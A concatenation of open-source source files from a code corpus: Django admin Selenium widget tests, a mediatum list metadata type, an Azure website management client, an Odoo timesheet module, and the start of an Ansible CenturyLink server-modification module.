super(AdminRawIdWidgetSeleniumFirefoxTests, self).setUp()
models.Band.objects.create(id=42, name='Bogey Blues')
models.Band.objects.create(id=98, name='Green Potatoes')
def test_ForeignKey(self):
self.admin_login(username='super', password='secret', login_url='/')
self.selenium.get(
'%s%s' % (self.live_server_url, reverse('admin:admin_widgets_event_add')))
main_window = self.selenium.current_window_handle
# No value has been selected yet
self.assertEqual(
self.selenium.find_element_by_id('id_main_band').get_attribute('value'),
'')
# Open the popup window and click on a band
self.selenium.find_element_by_id('lookup_id_main_band').click()
self.wait_for_popup()
self.selenium.switch_to.window('id_main_band')
link = self.selenium.find_element_by_link_text('Bogey Blues')
self.assertIn('/band/42/', link.get_attribute('href'))
link.click()
# The field now contains the selected band's id
self.selenium.switch_to.window(main_window)
self.wait_for_value('#id_main_band', '42')
# Reopen the popup window and click on another band
self.selenium.find_element_by_id('lookup_id_main_band').click()
self.wait_for_popup()
self.selenium.switch_to.window('id_main_band')
link = self.selenium.find_element_by_link_text('Green Potatoes')
self.assertIn('/band/98/', link.get_attribute('href'))
link.click()
# The field now contains the other selected band's id
self.selenium.switch_to.window(main_window)
self.wait_for_value('#id_main_band', '98')
def test_many_to_many(self):
self.admin_login(username='super', password='secret', login_url='/')
self.selenium.get(
'%s%s' % (self.live_server_url, reverse('admin:admin_widgets_event_add')))
main_window = self.selenium.current_window_handle
# No value has been selected yet
self.assertEqual(
self.selenium.find_element_by_id('id_supporting_bands').get_attribute('value'),
'')
# Open the popup window and click on a band
self.selenium.find_element_by_id('lookup_id_supporting_bands').click()
self.wait_for_popup()
self.selenium.switch_to.window('id_supporting_bands')
link = self.selenium.find_element_by_link_text('Bogey Blues')
self.assertIn('/band/42/', link.get_attribute('href'))
link.click()
# The field now contains the selected band's id
self.selenium.switch_to.window(main_window)
self.wait_for_value('#id_supporting_bands', '42')
# Reopen the popup window and click on another band
self.selenium.find_element_by_id('lookup_id_supporting_bands').click()
self.wait_for_popup()
self.selenium.switch_to.window('id_supporting_bands')
link = self.selenium.find_element_by_link_text('Green Potatoes')
self.assertIn('/band/98/', link.get_attribute('href'))
link.click()
# The field now contains the two selected bands' ids
self.selenium.switch_to.window(main_window)
self.wait_for_value('#id_supporting_bands', '42,98')
class AdminRawIdWidgetSeleniumChromeTests(AdminRawIdWidgetSeleniumFirefoxTests):
webdriver_class = 'selenium.webdriver.chrome.webdriver.WebDriver'
class AdminRawIdWidgetSeleniumIETests(AdminRawIdWidgetSeleniumFirefoxTests):
webdriver_class = 'selenium.webdriver.ie.webdriver.WebDriver'
@override_settings(PASSWORD_HASHERS=['django.contrib.auth.hashers.SHA1PasswordHasher'],
ROOT_URLCONF='admin_widgets.urls')
class RelatedFieldWidgetSeleniumFirefoxTests(SeleniumDataMixin, AdminSeleniumWebDriverTestCase):
available_apps = ['admin_widgets'] + AdminSeleniumWebDriverTestCase.available_apps
webdriver_class = 'selenium.webdriver.firefox.webdriver.WebDriver'
def test_ForeignKey_using_to_field(self):
self.admin_login(username='super', password='secret', login_url='/')
self.selenium.get('%s%s' % (
self.live_server_url,
reverse('admin:admin_widgets_profile_add')))
main_window = self.selenium.current_window_handle
        # Click the Add User button to add a new user
self.selenium.find_element_by_id('add_id_user').click()
self.wait_for_popup()
self.selenium.switch_to.window('id_user')
self.wait_for('#id_password')
password_field = self.selenium.find_element_by_id('id_password')
password_field.send_keys('password')
username_field = self.selenium.find_element_by_id('id_username')
username_value = 'newuser'
username_field.send_keys(username_value)
save_button_css_selector = '.submit-row > input[type=submit]'
self.selenium.find_element_by_css_selector(save_button_css_selector).click()
self.selenium.switch_to.window(main_window)
# The field now contains the new user
self.wait_for('#id_user option[value="newuser"]')
# Click the Change User button to change it
self.selenium.find_element_by_id('change_id_user').click()
self.wait_for_popup()
self.selenium.switch_to.window('id_user')
self.wait_for('#id_username')
username_field = self.selenium.find_element_by_id('id_username')
username_value = 'changednewuser'
username_field.clear()
username_field.send_keys(username_value)
save_button_css_selector = '.submit-row > input[type=submit]'
self.selenium.find_element_by_css_selector(save_button_css_selector).click()
self.selenium.switch_to.window(main_window)
# Wait up to 2 seconds for the new option to show up after clicking save in the popup.
self.selenium.implicitly_wait(2)
self.selenium.find_element_by_css_selector('#id_user option[value=changednewuser]')
self.selenium.implicitly_wait(0)
# Go ahead and submit the form to make sure it works
self.selenium.find_element_by_css_selector(save_button_css_selector).click()
self.wait_for_text('li.success', 'The profile "changednewuser" was added successfully.')
profiles = models.Profile.objects.all()
self.assertEqual(len(profiles), 1)
self.assertEqual(profiles[0].user.username, username_value)
class RelatedFieldWidgetSeleniumChromeTests(RelatedFieldWidgetSeleniumFirefoxTests):
webdriver_class = 'selenium.webdriver.chrome.webdriver.WebDriver'
class RelatedFieldWidgetSeleniumIETests(RelatedFieldWidgetSeleniumFirefoxTests):
webdriver_class = 'selenium.webdriver.ie.webdriver.WebDriver'
| bsd-3-clause |
mediatum/mediatum | metadata/list.py | 1 | 7868 | """
mediatum - a multimedia content repository
Copyright (C) 2007 Arne Seifert <[email protected]>
Copyright (C) 2007 Matthias Kramm <[email protected]>
Copyright (C) 2012 Iryna Feuerstein <[email protected]>
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
"""
import logging
import os
import codecs
from mediatumtal import tal
from utils.utils import esc
from core.metatype import Metatype, Context
from metadata.ilist import count_list_values_for_all_content_children
from core import Node
from core import db
q = db.query
logg = logging.getLogger(__name__)
class m_list(Metatype):
def formatValues(self, context):
valuelist = []
items = {}
try:
n = context.collection
if not isinstance(n, Node):
raise KeyError
field_name = context.field.getName()
id_attr_val = count_list_values_for_all_content_children(n.id, field_name)
items = {pair[0]: pair[1] for pair in id_attr_val}
        except KeyError:
            pass
tempvalues = context.field.getValueList()
valuesfiles = context.field.files.all()
if len(valuesfiles): # a text file with list values was uploaded
if os.path.isfile(valuesfiles[0].abspath):
with codecs.open(valuesfiles[0].abspath, 'r', encoding='utf8') as valuesfile:
tempvalues = valuesfile.readlines()
if len(tempvalues): # Has the user entered any values?
if tempvalues[0].find('|') > 0: # there are values in different languages available
languages = [x.strip() for x in tempvalues[0].split('|')] # find out the languages
valuesdict = dict((lang, []) for lang in languages) # create a dictionary with languages as keys,
# and list of respective values as dictionary values
for i in range(len(tempvalues)):
                    if i:  # if i is not 0, the language names themselves shouldn't be included in the values
tmp = tempvalues[i].split('|')
for j in range(len(tmp)):
valuesdict[languages[j]].append(tmp[j])
lang = context.language
# if there is no default language, the first language-value will be used
if (not lang) or (lang not in valuesdict.keys()):
lang = languages[0]
tempvalues = valuesdict[lang]
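        # Illustrative sketch (added for clarity; the sample values are
        # hypothetical, not from the original source): an uploaded values file
        # such as
        #     de|en
        #     Wert1|value1
        #     Wert2|value2
        # makes the block above build
        #     {'de': ['Wert1', 'Wert2'], 'en': ['value1', 'value2']}
        # and select the list matching context.language, falling back to the
        # first declared language.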
for val in tempvalues:
indent = 0
canbeselected = 0
while val.startswith("*"):
val = val[1:]
indent = indent + 1
if val.startswith(" "):
canbeselected = 1
val = val.strip()
if not indent:
canbeselected = 1
if indent > 0:
indent = indent - 1
indentstr = " " * (2 * indent)
num = 0
if val in items.keys():
num = int(items[val])
try:
if int(num) < 0:
raise Exception()
elif int(num) == 0:
num = ""
else:
num = " (" + ustr(num) + ")"
except:
logg.exception("exception in getMaskEditorHTML, using empty string")
num = ""
val = esc(val)
if not canbeselected:
valuelist.append(("optgroup", "<optgroup label=\"" + indentstr + val + "\">", "", ""))
elif (val in context.value.split(";")):
valuelist.append(("optionselected", indentstr, val, num))
else:
valuelist.append(("option", indentstr, val, num))
return valuelist
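    # Shape of the list formatValues() returns, sketched with hypothetical
    # values (each entry is a 4-tuple consumed by the list.html TAL macros):
    #     [("optgroup", '<optgroup label="Group">', "", ""),
    #      ("optionselected", "  ", "Wert1", " (3)"),
    #      ("option", "", "Wert2", "")]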
def getEditorHTML(self, field, value="", width=400, lock=0, language=None, required=None):
context = Context(field, value=value, width=width, name=field.getName(), lock=lock, language=language)
return tal.getTAL("metadata/list.html", {"context": context,
"valuelist": filter(lambda x: x != "", self.formatValues(context)),
"required": self.is_required(required)},
macro="editorfield",
language=language)
def getSearchHTML(self, context):
return tal.getTAL("metadata/list.html",
{"context": context,
"valuelist": filter(lambda x: x != "",
self.formatValues(context))},
macro="searchfield",
language=context.language)
def getFormattedValue(self, metafield, maskitem, mask, node, language, html=True):
value = node.get(metafield.getName()).replace(";", "; ")
if html:
value = esc(value)
return (metafield.getLabel(), value)
def format_request_value_for_db(self, field, params, item, language=None):
if field.get('multiple'):
valuelist = params.getlist(item)
value = ";".join(valuelist)
else:
value = params.get(item)
return value.replace("; ", ";")
def getMaskEditorHTML(self, field, metadatatype=None, language=None):
value = u""
filename = u""
multiple_list = u""
try:
if field:
value = field.getValues()
if field.id and len(field.files) > 0:
filename = os.path.basename(field.files[0].abspath)
multiple_list = field.get('multiple')
except AttributeError:
value = field
return tal.getTAL("metadata/list.html",
{"value": value,
"filename": filename,
"multiple_list": multiple_list},
macro="maskeditor",
language=language)
def getName(self):
return "fieldtype_list"
def getInformation(self):
return {"moduleversion": "1.1", "softwareversion": "1.1"}
# method for additional keys of type list
def getLabels(self):
return m_list.labels
labels = {"de":
[
("list_multiple", "Mehrfachauswahl:"),
("current_file", "Aktuelle Textdatei: "),
("delete_valuesfile", "Vorhandene Datei löschen"),
("list_list_values_file", "Datei mit Listenwerten:"),
("list_list_values", "Listenwerte:"),
("fieldtype_list", "Werteliste"),
("fieldtype_list_desc", "Werte-Auswahlfeld als Drop-Down Liste")
],
"en":
[
("list_multiple", "Multiple choice:"),
("current_file", "Current values file: "),
("delete_valuesfile", "Delete the current text file"),
("list_list_values_file", "Textfile with list values:"),
("list_list_values", "List values:"),
("fieldtype_list", "valuelist"),
("fieldtype_list_desc", "drop down valuelist")
]
}
| gpl-3.0 |
varunkumta/azure-linux-extensions | CustomScript/azure/servicemanagement/websitemanagementservice.py | 46 | 10015 | #-------------------------------------------------------------------------
# Copyright (c) Microsoft. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#--------------------------------------------------------------------------
from azure import (
MANAGEMENT_HOST,
_str,
)
from azure.servicemanagement import (
WebSpaces,
WebSpace,
Sites,
Site,
MetricResponses,
MetricDefinitions,
PublishData,
_XmlSerializer,
)
from azure.servicemanagement.servicemanagementclient import (
_ServiceManagementClient,
)
class WebsiteManagementService(_ServiceManagementClient):
    ''' Note that this class is preliminary work on WebSite
    management. Since it lacks a lot of features, the final version
    may differ slightly from the current one.
'''
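    # Minimal usage sketch (hypothetical subscription id and certificate path,
    # not values from this module; the results are the deserialized
    # WebSpaces/Sites response objects):
    #
    #     wms = WebsiteManagementService('my-subscription-id', 'my-cert.pem')
    #     spaces = wms.list_webspaces()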
def __init__(self, subscription_id=None, cert_file=None,
host=MANAGEMENT_HOST):
super(WebsiteManagementService, self).__init__(
subscription_id, cert_file, host)
#--Operations for web sites ----------------------------------------
def list_webspaces(self):
'''
List the webspaces defined on the account.
'''
return self._perform_get(self._get_list_webspaces_path(),
WebSpaces)
def get_webspace(self, webspace_name):
'''
Get details of a specific webspace.
webspace_name: The name of the webspace.
'''
return self._perform_get(self._get_webspace_details_path(webspace_name),
WebSpace)
def list_sites(self, webspace_name):
'''
List the web sites defined on this webspace.
webspace_name: The name of the webspace.
'''
return self._perform_get(self._get_sites_path(webspace_name),
Sites)
def get_site(self, webspace_name, website_name):
'''
        Get details of a specific web site on this webspace.
webspace_name: The name of the webspace.
website_name: The name of the website.
'''
return self._perform_get(self._get_sites_details_path(webspace_name,
website_name),
Site)
def create_site(self, webspace_name, website_name, geo_region, host_names,
plan='VirtualDedicatedPlan', compute_mode='Shared',
server_farm=None, site_mode=None):
'''
Create a website.
webspace_name: The name of the webspace.
website_name: The name of the website.
geo_region:
The geographical region of the webspace that will be created.
host_names:
An array of fully qualified domain names for website. Only one
hostname can be specified in the azurewebsites.net domain.
The hostname should match the name of the website. Custom domains
can only be specified for Shared or Standard websites.
plan:
This value must be 'VirtualDedicatedPlan'.
compute_mode:
This value should be 'Shared' for the Free or Paid Shared
offerings, or 'Dedicated' for the Standard offering. The default
value is 'Shared'. If you set it to 'Dedicated', you must specify
a value for the server_farm parameter.
server_farm:
The name of the Server Farm associated with this website. This is
a required value for Standard mode.
site_mode:
Can be None, 'Limited' or 'Basic'. This value is 'Limited' for the
Free offering, and 'Basic' for the Paid Shared offering. Standard
mode does not use the site_mode parameter; it uses the compute_mode
parameter.
'''
xml = _XmlSerializer.create_website_to_xml(webspace_name, website_name, geo_region, plan, host_names, compute_mode, server_farm, site_mode)
return self._perform_post(
self._get_sites_path(webspace_name),
xml,
Site)
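    # Hypothetical call matching the parameter docs above ('myspace',
    # 'mysite' and the server farm name are placeholders):
    #     create_site('myspace', 'mysite', 'West US',
    #                 ['mysite.azurewebsites.net'],
    #                 compute_mode='Dedicated', server_farm='myfarm')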
def delete_site(self, webspace_name, website_name,
delete_empty_server_farm=False, delete_metrics=False):
'''
Delete a website.
webspace_name: The name of the webspace.
website_name: The name of the website.
delete_empty_server_farm:
If the site being deleted is the last web site in a server farm,
you can delete the server farm by setting this to True.
delete_metrics:
To also delete the metrics for the site that you are deleting, you
can set this to True.
'''
path = self._get_sites_details_path(webspace_name, website_name)
query = ''
if delete_empty_server_farm:
query += '&deleteEmptyServerFarm=true'
if delete_metrics:
query += '&deleteMetrics=true'
if query:
path = path + '?' + query.lstrip('&')
return self._perform_delete(path)
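    # For example (placeholder names), delete_site('myspace', 'mysite',
    # delete_empty_server_farm=True, delete_metrics=True) issues a DELETE at
    # services/webspaces/myspace/sites/mysite?deleteEmptyServerFarm=true&deleteMetrics=true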
def restart_site(self, webspace_name, website_name):
'''
Restart a web site.
webspace_name: The name of the webspace.
website_name: The name of the website.
'''
return self._perform_post(
self._get_restart_path(webspace_name, website_name),
'')
    def get_historical_usage_metrics(self, webspace_name, website_name,
                                     metrics=None, start_time=None, end_time=None, time_grain=None):
'''
Get historical usage metrics.
webspace_name: The name of the webspace.
website_name: The name of the website.
        metrics: Optional. List of metric names. Otherwise, all metrics are returned.
start_time: Optional. An ISO8601 date. Otherwise, current hour is used.
end_time: Optional. An ISO8601 date. Otherwise, current time is used.
        time_grain: Optional. A rollup name, such as P1D. Otherwise, the default rollup for the metrics is used.
        More information and metric names at:
http://msdn.microsoft.com/en-us/library/azure/dn166964.aspx
'''
metrics = ('names='+','.join(metrics)) if metrics else ''
start_time = ('StartTime='+start_time) if start_time else ''
end_time = ('EndTime='+end_time) if end_time else ''
time_grain = ('TimeGrain='+time_grain) if time_grain else ''
parameters = ('&'.join(v for v in (metrics, start_time, end_time, time_grain) if v))
parameters = '?'+parameters if parameters else ''
return self._perform_get(self._get_historical_usage_metrics_path(webspace_name, website_name) + parameters,
MetricResponses)
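    # Example of the query string this builds (hypothetical arguments):
    # get_historical_usage_metrics('myspace', 'mysite', metrics=['CpuTime'],
    # time_grain='P1D') requests the metrics path plus
    # '?names=CpuTime&TimeGrain=P1D'.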
def get_metric_definitions(self, webspace_name, website_name):
'''
Get metric definitions of metrics available of this web site.
webspace_name: The name of the webspace.
website_name: The name of the website.
'''
return self._perform_get(self._get_metric_definitions_path(webspace_name, website_name),
MetricDefinitions)
def get_publish_profile_xml(self, webspace_name, website_name):
'''
Get a site's publish profile as a string
webspace_name: The name of the webspace.
website_name: The name of the website.
'''
return self._perform_get(self._get_publishxml_path(webspace_name, website_name),
None).body.decode("utf-8")
def get_publish_profile(self, webspace_name, website_name):
'''
Get a site's publish profile as an object
webspace_name: The name of the webspace.
website_name: The name of the website.
'''
return self._perform_get(self._get_publishxml_path(webspace_name, website_name),
PublishData)
#--Helper functions --------------------------------------------------
def _get_list_webspaces_path(self):
return self._get_path('services/webspaces', None)
def _get_webspace_details_path(self, webspace_name):
return self._get_path('services/webspaces/', webspace_name)
def _get_sites_path(self, webspace_name):
return self._get_path('services/webspaces/',
webspace_name) + '/sites'
def _get_sites_details_path(self, webspace_name, website_name):
return self._get_path('services/webspaces/',
webspace_name) + '/sites/' + _str(website_name)
def _get_restart_path(self, webspace_name, website_name):
return self._get_path('services/webspaces/',
webspace_name) + '/sites/' + _str(website_name) + '/restart/'
def _get_historical_usage_metrics_path(self, webspace_name, website_name):
return self._get_path('services/webspaces/',
webspace_name) + '/sites/' + _str(website_name) + '/metrics/'
def _get_metric_definitions_path(self, webspace_name, website_name):
return self._get_path('services/webspaces/',
webspace_name) + '/sites/' + _str(website_name) + '/metricdefinitions/'
def _get_publishxml_path(self, webspace_name, website_name):
return self._get_path('services/webspaces/',
webspace_name) + '/sites/' + _str(website_name) + '/publishxml/'
| apache-2.0 |
codekaki/odoo | addons/hr_timesheet/hr_timesheet.py | 39 | 9938 | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
import time
from openerp.osv import fields
from openerp.osv import osv
from openerp.tools.translate import _
class hr_employee(osv.osv):
_name = "hr.employee"
_inherit = "hr.employee"
_columns = {
'product_id': fields.many2one('product.product', 'Product', help="Specifies employee's designation as a product with type 'service'."),
'journal_id': fields.many2one('account.analytic.journal', 'Analytic Journal'),
'uom_id': fields.related('product_id', 'uom_id', type='many2one', relation='product.uom', string='Unit of Measure', store=True, readonly=True)
}
def _getAnalyticJournal(self, cr, uid, context=None):
md = self.pool.get('ir.model.data')
try:
dummy, res_id = md.get_object_reference(cr, uid, 'hr_timesheet', 'analytic_journal')
#search on id found in result to check if current user has read access right
check_right = self.pool.get('account.analytic.journal').search(cr, uid, [('id', '=', res_id)], context=context)
if check_right:
return res_id
except ValueError:
pass
return False
def _getEmployeeProduct(self, cr, uid, context=None):
md = self.pool.get('ir.model.data')
try:
dummy, res_id = md.get_object_reference(cr, uid, 'product', 'product_product_consultant')
#search on id found in result to check if current user has read access right
check_right = self.pool.get('product.template').search(cr, uid, [('id', '=', res_id)], context=context)
if check_right:
return res_id
except ValueError:
pass
return False
_defaults = {
'journal_id': _getAnalyticJournal,
'product_id': _getEmployeeProduct
}
hr_employee()
class hr_analytic_timesheet(osv.osv):
_name = "hr.analytic.timesheet"
_table = 'hr_analytic_timesheet'
_description = "Timesheet Line"
_inherits = {'account.analytic.line': 'line_id'}
_order = "id desc"
_columns = {
'line_id': fields.many2one('account.analytic.line', 'Analytic Line', ondelete='cascade', required=True),
'partner_id': fields.related('account_id', 'partner_id', type='many2one', string='Partner', relation='res.partner', store=True),
}
def unlink(self, cr, uid, ids, context=None):
toremove = {}
for obj in self.browse(cr, uid, ids, context=context):
toremove[obj.line_id.id] = True
self.pool.get('account.analytic.line').unlink(cr, uid, toremove.keys(), context=context)
return super(hr_analytic_timesheet, self).unlink(cr, uid, ids, context=context)
def on_change_unit_amount(self, cr, uid, id, prod_id, unit_amount, company_id, unit=False, journal_id=False, context=None):
res = {'value':{}}
if prod_id and unit_amount:
# find company
company_id = self.pool.get('res.company')._company_default_get(cr, uid, 'account.analytic.line', context=context)
r = self.pool.get('account.analytic.line').on_change_unit_amount(cr, uid, id, prod_id, unit_amount, company_id, unit, journal_id, context=context)
if r:
res.update(r)
# update unit of measurement
if prod_id:
uom = self.pool.get('product.product').browse(cr, uid, prod_id, context=context)
if uom.uom_id:
res['value'].update({'product_uom_id': uom.uom_id.id})
else:
res['value'].update({'product_uom_id': False})
return res
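    # Summary sketch: changing the product or quantity re-derives the line's
    # amount through the analytic line's own on_change_unit_amount(), and the
    # product's unit of measure is mirrored into product_uom_id (or cleared
    # when the product has no unit set).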
def _getEmployeeProduct(self, cr, uid, context=None):
if context is None:
context = {}
emp_obj = self.pool.get('hr.employee')
emp_id = emp_obj.search(cr, uid, [('user_id', '=', context.get('user_id') or uid)], context=context)
if emp_id:
emp = emp_obj.browse(cr, uid, emp_id[0], context=context)
if emp.product_id:
return emp.product_id.id
return False
def _getEmployeeUnit(self, cr, uid, context=None):
emp_obj = self.pool.get('hr.employee')
if context is None:
context = {}
emp_id = emp_obj.search(cr, uid, [('user_id', '=', context.get('user_id') or uid)], context=context)
if emp_id:
emp = emp_obj.browse(cr, uid, emp_id[0], context=context)
if emp.product_id:
return emp.product_id.uom_id.id
return False
def _getGeneralAccount(self, cr, uid, context=None):
emp_obj = self.pool.get('hr.employee')
if context is None:
context = {}
emp_id = emp_obj.search(cr, uid, [('user_id', '=', context.get('user_id') or uid)], context=context)
if emp_id:
emp = emp_obj.browse(cr, uid, emp_id[0], context=context)
            if emp.product_id:
a = emp.product_id.property_account_expense.id
if not a:
a = emp.product_id.categ_id.property_account_expense_categ.id
if a:
return a
return False
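    # Resolution order used above: the expense account set directly on the
    # employee's product wins; otherwise the product category's expense
    # account is used; if neither is set, the default stays False.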
def _getAnalyticJournal(self, cr, uid, context=None):
emp_obj = self.pool.get('hr.employee')
if context is None:
context = {}
if context.get('employee_id'):
emp_id = [context.get('employee_id')]
else:
emp_id = emp_obj.search(cr, uid, [('user_id','=',context.get('user_id') or uid)], limit=1, context=context)
if not emp_id:
raise osv.except_osv(_('Warning!'), _('Please create an employee for this user, using the menu: Human Resources > Employees.'))
emp = emp_obj.browse(cr, uid, emp_id[0], context=context)
if emp.journal_id:
return emp.journal_id.id
        else:
raise osv.except_osv(_('Warning!'), _('No analytic journal defined for \'%s\'.\nYou should assign an analytic journal on the employee form.')%(emp.name))
_defaults = {
'product_uom_id': _getEmployeeUnit,
'product_id': _getEmployeeProduct,
'general_account_id': _getGeneralAccount,
'journal_id': _getAnalyticJournal,
'date': lambda self, cr, uid, ctx: ctx.get('date', fields.date.context_today(self,cr,uid,context=ctx)),
'user_id': lambda obj, cr, uid, ctx: ctx.get('user_id') or uid,
}
def on_change_account_id(self, cr, uid, ids, account_id, context=None):
return {'value':{}}
def on_change_date(self, cr, uid, ids, date):
if ids:
new_date = self.read(cr, uid, ids[0], ['date'])['date']
if date != new_date:
warning = {'title':'User Alert!','message':'Changing the date will let this entry appear in the timesheet of the new date.'}
return {'value':{},'warning':warning}
return {'value':{}}
def create(self, cr, uid, vals, context=None):
if context is None:
context = {}
emp_obj = self.pool.get('hr.employee')
emp_id = emp_obj.search(cr, uid, [('user_id', '=', context.get('user_id') or uid)], context=context)
ename = ''
if emp_id:
ename = emp_obj.browse(cr, uid, emp_id[0], context=context).name
if not vals.get('journal_id',False):
raise osv.except_osv(_('Warning!'), _('No \'Analytic Journal\' is defined for employee %s \nDefine an employee for the selected user and assign an \'Analytic Journal\'!')%(ename,))
if not vals.get('account_id',False):
raise osv.except_osv(_('Warning!'), _('No analytic account is defined on the project.\nPlease set one or we cannot automatically fill the timesheet.'))
return super(hr_analytic_timesheet, self).create(cr, uid, vals, context=context)
def on_change_user_id(self, cr, uid, ids, user_id):
if not user_id:
return {}
context = {'user_id': user_id}
return {'value': {
'product_id': self. _getEmployeeProduct(cr, uid, context),
'product_uom_id': self._getEmployeeUnit(cr, uid, context),
'general_account_id': self._getGeneralAccount(cr, uid, context),
'journal_id': self._getAnalyticJournal(cr, uid, context),
}}
class account_analytic_account(osv.osv):
_inherit = 'account.analytic.account'
_description = 'Analytic Account'
_columns = {
'use_timesheets': fields.boolean('Timesheets', help="Check this field if this project manages timesheets"),
}
def on_change_template(self, cr, uid, ids, template_id, context=None):
res = super(account_analytic_account, self).on_change_template(cr, uid, ids, template_id, context=context)
if template_id and 'value' in res:
template = self.browse(cr, uid, template_id, context=context)
res['value']['use_timesheets'] = template.use_timesheets
return res
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| agpl-3.0 |
matbu/ansible-modules-extras | cloud/centurylink/clc_modify_server.py | 48 | 35314 | #!/usr/bin/python
#
# Copyright (c) 2015 CenturyLink
#
# This file is part of Ansible.
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>
#
ANSIBLE_METADATA = {'status': ['preview'],
'supported_by': 'community',
'version': '1.0'}
DOCUMENTATION = '''
module: clc_modify_server
short_description: modify servers in CenturyLink Cloud.
description:
- An Ansible module to modify servers in CenturyLink Cloud.
version_added: "2.0"
options:
server_ids:
description:
- A list of server Ids to modify.
required: True
cpu:
description:
- How many CPUs to update on the server
required: False
default: None
memory:
description:
- Memory (in GB) to set to the server.
required: False
default: None
anti_affinity_policy_id:
description:
- The anti affinity policy id to be set for a hyper scale server.
This is mutually exclusive with 'anti_affinity_policy_name'
required: False
default: None
anti_affinity_policy_name:
description:
- The anti affinity policy name to be set for a hyper scale server.
This is mutually exclusive with 'anti_affinity_policy_id'
required: False
default: None
alert_policy_id:
description:
- The alert policy id to be associated to the server.
This is mutually exclusive with 'alert_policy_name'
required: False
default: None
alert_policy_name:
description:
- The alert policy name to be associated to the server.
This is mutually exclusive with 'alert_policy_id'
required: False
default: None
state:
description:
- The state to ensure that the provided resources are in.
default: 'present'
required: False
choices: ['present', 'absent']
wait:
description:
- Whether to wait for the provisioning tasks to finish before returning.
default: True
required: False
choices: [ True, False]
requirements:
- python = 2.7
- requests >= 2.5.0
- clc-sdk
author: "CLC Runner (@clc-runner)"
notes:
- To use this module, it is required to set the below environment variables, which enable access to the
CenturyLink Cloud
- CLC_V2_API_USERNAME, the account login id for the centurylink cloud
- CLC_V2_API_PASSWD, the account password for the centurylink cloud
- Alternatively, the module accepts the API token and account alias. The API token can be generated using the
CLC account login and password via the HTTP api call @ https://api.ctl.io/v2/authentication/login
- CLC_V2_API_TOKEN, the API token generated from https://api.ctl.io/v2/authentication/login
- CLC_ACCT_ALIAS, the account alias associated with the centurylink cloud
- Users can set CLC_V2_API_URL to specify an endpoint for pointing to a different CLC environment.
'''
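# A minimal shell sketch (illustrative values only; not part of the original
# module) for the environment variables described in the notes above:
#   export CLC_V2_API_USERNAME='my_clc_login'
#   export CLC_V2_API_PASSWD='my_clc_password'
#   # or, alternatively, token-based access:
#   export CLC_V2_API_TOKEN='<token from https://api.ctl.io/v2/authentication/login>'
#   export CLC_ACCT_ALIAS='MYALIAS'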
EXAMPLES = '''
# Note - You must set the CLC_V2_API_USERNAME and CLC_V2_API_PASSWD environment variables before running these examples
- name: set the cpu count to 4 on a server
clc_modify_server:
server_ids:
- UC1TESTSVR01
- UC1TESTSVR02
cpu: 4
state: present
- name: set the memory to 8GB on a server
clc_modify_server:
server_ids:
- UC1TESTSVR01
- UC1TESTSVR02
memory: 8
state: present
- name: set the anti affinity policy on a server
clc_modify_server:
server_ids:
- UC1TESTSVR01
- UC1TESTSVR02
anti_affinity_policy_name: 'aa_policy'
state: present
- name: remove the anti affinity policy on a server
clc_modify_server:
server_ids:
- UC1TESTSVR01
- UC1TESTSVR02
anti_affinity_policy_name: 'aa_policy'
state: absent
- name: add the alert policy on a server
clc_modify_server:
server_ids:
- UC1TESTSVR01
- UC1TESTSVR02
alert_policy_name: 'alert_policy'
state: present
- name: remove the alert policy on a server
clc_modify_server:
server_ids:
- UC1TESTSVR01
- UC1TESTSVR02
alert_policy_name: 'alert_policy'
state: absent
- name: set the memory to 16GB and cpu to 8 cores on a list of servers
clc_modify_server:
server_ids:
- UC1TESTSVR01
- UC1TESTSVR02
cpu: 8
memory: 16
state: present
'''
RETURN = '''
server_ids:
description: The list of server ids that are changed
returned: success
type: list
sample:
[
"UC1TEST-SVR01",
"UC1TEST-SVR02"
]
servers:
description: The list of server objects that are changed
returned: success
type: list
sample:
[
{
"changeInfo":{
"createdBy":"service.wfad",
"createdDate":1438196820,
"modifiedBy":"service.wfad",
"modifiedDate":1438196820
},
"description":"test-server",
"details":{
"alertPolicies":[
],
"cpu":1,
"customFields":[
],
"diskCount":3,
"disks":[
{
"id":"0:0",
"partitionPaths":[
],
"sizeGB":1
},
{
"id":"0:1",
"partitionPaths":[
],
"sizeGB":2
},
{
"id":"0:2",
"partitionPaths":[
],
"sizeGB":14
}
],
"hostName":"",
"inMaintenanceMode":false,
"ipAddresses":[
{
"internal":"10.1.1.1"
}
],
"memoryGB":1,
"memoryMB":1024,
"partitions":[
],
"powerState":"started",
"snapshots":[
],
"storageGB":17
},
"groupId":"086ac1dfe0b6411989e8d1b77c4065f0",
"id":"test-server",
"ipaddress":"10.120.45.23",
"isTemplate":false,
"links":[
{
"href":"/v2/servers/wfad/test-server",
"id":"test-server",
"rel":"self",
